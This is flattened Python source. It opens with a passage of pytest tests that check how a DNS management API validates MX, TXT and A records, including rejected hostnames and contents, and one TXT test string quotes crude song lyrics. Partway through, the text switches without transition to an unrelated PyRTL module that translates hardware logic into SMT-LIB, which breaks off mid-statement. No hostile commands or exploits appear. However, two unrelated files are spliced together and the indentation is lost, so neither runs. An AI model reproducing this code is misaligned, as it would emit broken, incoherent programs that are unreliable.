self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: mail
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'mail'
expected_content_serial = priority + ' mail.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: A-0c
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A-0c'
expected_content_serial = priority + ' a-0c.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: o12345670123456701234567012345670123456701234567012345670123456
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'o12345670123456701234567012345670123456701234567012345670123456'
expected_content_serial = priority + ' o12345670123456701234567012345670123456701234567012345670123456.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
### TEST VIEW_ALL
d = {"view_all":{"tags":{"id_record": ""}}}
res = test_data.post_data(client,'record',d,headers)
d = {"view_all":{"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'record',d,headers)
########## FAILURE hostname : @ , content: -A0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = '-A0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : @ , content: A0c-
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A0c-'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : @ , content: A.-0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A.-0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : @ , content: A-.0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A-.0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : @ , content: o123456701234567012345670123456701234567012345670123456701234567
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : www.
hostname_ = 'www.'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : mail.cobadns08.xyz.
hostname_ = 'mail.cobadns08.xyz.'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : *
hostname_ = '*'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : -A0c
hostname_ = '-A0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A0c-
hostname_ = 'A0c-'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A.-0c
hostname_ = 'A.-0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A-.0c
hostname_ = 'A-.0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : o123456701234567012345670123456701234567012345670123456701234567
hostname_ = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
##### hostname : A-1c content: mail.google.com. EDITING SERIAL DATA
hostname = 'A-1c'
expected_hostname = 'a-1c.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' store.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
id_content_serial = res['id_content_serial']
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
## EDIT
new_content = "store.google.com."
res = test_data.edit_serial_data(client,headers,id_content_serial,id_record,new_content)
assert res.status_code == 200
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
test_data.teardown(client,headers)
self.testset.remove(test_data)
@pytest.mark.skip()
def test_validation_txt(self,client,get_header):
record_type = 'txt'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "agus agus"
expected_content = '"agus agus"'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus'agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "agus'agus"
expected_content = '''"agus'agus"'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus"agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = """agus"agus"""
expected_content = '''"agus\\"agus"'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
response = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(response,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : "
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = '"'
expected_content = '''"\\""'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
response = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(response,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : '
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "'"
expected_content = '"\'"'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
response = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(response,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : longer than 255 characters (split into two TXT strings)
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = 'Tripping off the beat kinda, dripping off the meat grinder Heat niner, pimping, stripping, soft sweet minor China was a neat signer, trouble with the script Digits double dipped, bubble lipped, subtle lisp midget Borderline schizo, sort of fine tits though'
expected_content = '"{}" "{}"'.format(content[:255].lower(),content[255:].lower())
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
response = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(response,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '£'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
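The `expected_content` values in the TXT cases above all follow the same quoting rule: content is wrapped in double quotes, embedded double quotes are backslash-escaped, and content longer than 255 characters is split into 255-character strings. A minimal sketch of that rule as a standalone helper (hypothetical, not part of the test suite; it omits server-side normalization such as lowercasing):

```python
def quote_txt(content):
    # Split into 255-character chunks (TXT character-strings are limited
    # to 255 bytes), then wrap each chunk in double quotes, escaping any
    # embedded double quotes with a backslash.
    chunks = [content[i:i + 255] for i in range(0, len(content), 255)]
    return " ".join('"%s"' % c.replace('"', '\\"') for c in chunks)

print(quote_txt('agus"agus'))  # -> "agus\"agus"
```

This reproduces the expected values used above, e.g. `quote_txt("'")` yields `"'"` and a 300-character string yields two quoted chunks.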
def test_validation_a(self,client,get_header):
record_type = 'a'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
###### hostname : @, content : 192.168.1.1
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "192.168.1.1"
expected_content = '192.168.1.1'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
response = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(response,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'localhost'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'sembarangan'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '270.0.0.2'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
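The failing inputs above (`localhost`, `sembarangan`, `270.0.0.2`) are all rejected for the same reason: an A record's content must be a literal IPv4 address, not a hostname or an address with an out-of-range octet. A sketch of the kind of check the API presumably performs (hypothetical helper):

```python
import ipaddress

def is_valid_a_content(content):
    # A-record content must parse as a literal IPv4 address; hostnames
    # like "localhost" and malformed addresses like "270.0.0.2" fail.
    try:
        ipaddress.IPv4Address(content)
        return True
    except ipaddress.AddressValueError:
        return False

print(is_valid_a_content("192.168.1.1"))  # True
print(is_valid_a_content("270.0.0.2"))    # False: octet out of range
print(is_valid_a_content("localhost"))    # False: not a literal address
```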
def test_validation_teardown(self,client,get_header):
headers = get_header
test_data = self.testset
if len(test_data) > 0:
for i in test_data:
try:
i.teardown(client,headers)
except Exception:
# best-effort cleanup: ignore data already torn down by earlier tests
pass
# pyrtl/symbolic/tosmt.py (zou-sheng/PyRTL, BSD-3-Clause)
import z3
import tempfile
import random
from ..wire import Input, Output, Register, Const, WireVector
from ..fuzz.aflMutators import int2bin
from ..core import Block
from ..memory import RomBlock, MemBlock
def transfer_to_bin(value, bitwidth):
return "#b" + int2bin(value, bitwidth)
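For reference, `transfer_to_bin` turns an integer into an SMT-LIB binary bit-vector literal (`#b` plus a fixed-width binary string), and `translate_to_smt` below emits one `declare-const` per wire plus one `assert` per logic net. A self-contained sketch of both patterns (with a hypothetical stand-in for `int2bin`, assumed here to zero-pad to `bitwidth` bits using two's complement):

```python
import io

def transfer_to_bin_sketch(value, bitwidth):
    # Stand-in for transfer_to_bin: an SMT-LIB binary literal is "#b"
    # followed by a fixed-width, zero-padded binary string.
    return "#b" + format(value % (1 << bitwidth), "0{}b".format(bitwidth))

def emit_and(out, dest, a, b, width):
    # Mirrors the per-net pattern used throughout translate_to_smt:
    # declare each wire once, then assert the operator relation.
    for name in (dest, a, b):
        out.write("(declare-const %s (_ BitVec %s))\n" % (name, width))
    out.write("(assert (= %s (bvand %s %s)))\n" % (dest, a, b))

buf = io.StringIO()
emit_and(buf, "tmp0", "a", "b", 4)
print(transfer_to_bin_sketch(5, 8))  # -> #b00000101
print(buf.getvalue())
```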
def translate_to_smt(block, output_file, circle=1, rom_blocks=None):
"""Write an SMT-LIB 2 encoding of ``block`` to ``output_file``.

``circle`` is the number of clock cycles to unroll; when it is greater
than 1, every wire name is suffixed with ``_<cycle>``. ``rom_blocks``
optionally lists ROM blocks whose contents are asserted up front.
"""
consts = dict()
for wire in list(block.wirevector_subset()):
if type(wire) == Const:
# Const names can look like const_0_1'b1; strip everything from the
# apostrophe onward so the name is a legal SMT-LIB identifier.
wire.name = wire.name.split("'")[0]
consts[wire.name] = wire
Declare = []
# write "Main"
# node_cntr = 0
initializedMem = []
##################################
# If there are ROM blocks, their contents need to be initialized first.
if rom_blocks is not None:
for x in rom_blocks:
if x.name not in initializedMem:
initializedMem.append(x.name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (x.name, x.addrwidth, x.bitwidth))
# if rom data is a function, calculate the data first
if callable(x.data):
romdata = [x.data(i) for i in range(2 ** x.addrwidth)]
x.data = romdata
# write rom block initialization data
for i in range(len(x.data)):
output_file.write("(assert (= (store %s %s %s) %s))\n" % (x.name, transfer_to_bin(i, x.addrwidth), transfer_to_bin(x.data[i], x.bitwidth), x.name))
##################################
if circle == 1:
for log_net in list(block.logic_subset()):
if log_net.op == '&':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvand %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '|':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvor %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '^':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvxor %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == 'n':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvnand %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '~':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= %s (bvnot %s)))\n" % (log_net.dests[0].name, log_net.args[0].name))
elif log_net.op == '+':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
a = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
a = a + " (concat #b1 " + log_net.args[i].name + ") "
else:
a = a + " ((_ zero_extend 1) " + log_net.args[i].name + ") "
output_file.write("(assert (= %s (bvadd %s)))\n" % (log_net.dests[0].name, a))
elif log_net.op == '-':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
sub = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
sub = sub + " (concat #b1 " + log_net.args[i].name + ") "
else:
sub = sub + " ((_ zero_extend 1) " + log_net.args[i].name + ") "
output_file.write("(assert (= %s (bvsub %s)))\n" % (log_net.dests[0].name, sub))
elif log_net.op == '*':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
mul = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
mu = ''
for j in range(0, log_net.args[i].bitwidth):
mu = mu + '1'
mul = mul + " (concat #b" + mu + " " + log_net.args[i].name + ") "
else:
mul = mul + " ((_ zero_extend " + str(log_net.args[i].bitwidth) + ") " + log_net.args[
i].name + ") "
output_file.write("(assert (= %s (bvmul %s)))\n" % (log_net.dests[0].name, mul))
elif log_net.op == '=':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (= %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == '<':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (bvult %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == '>':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (bvugt %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == 'w':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= %s %s))\n" % (log_net.dests[0].name, log_net.args[0].name))
elif log_net.op == 'x':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
if log_net.args[2].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[2].name, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name)
output_file.write("(assert (ite (= %s #b0) (= %s %s) (= %s %s)))\n" % (
log_net.args[0].name, log_net.dests[0].name, log_net.args[1].name, log_net.dests[0].name,
log_net.args[2].name))
elif log_net.op == 'c':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
c = ''
for i in range(len(log_net.args)):
if log_net.args[i].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[i].name, log_net.args[i].bitwidth))
Declare.append(log_net.args[i].name)
c = c + ' ' + log_net.args[i].name
output_file.write("(assert (= %s (concat %s)))\n" % (log_net.dests[0].name, c))
elif log_net.op == 's':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
string = ''
for i in log_net.op_param[::-1]:
string = string + "((_ extract " + str(i) + " " + str(i) + ")" + " " + log_net.args[0].name + ") "
output_file.write("(assert (= %s (concat %s)))\n" % (log_net.dests[0].name, string))
elif log_net.op == 'm':  # memory read
if log_net.op_param[1].name not in initializedMem:
initializedMem.append(log_net.op_param[1].name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
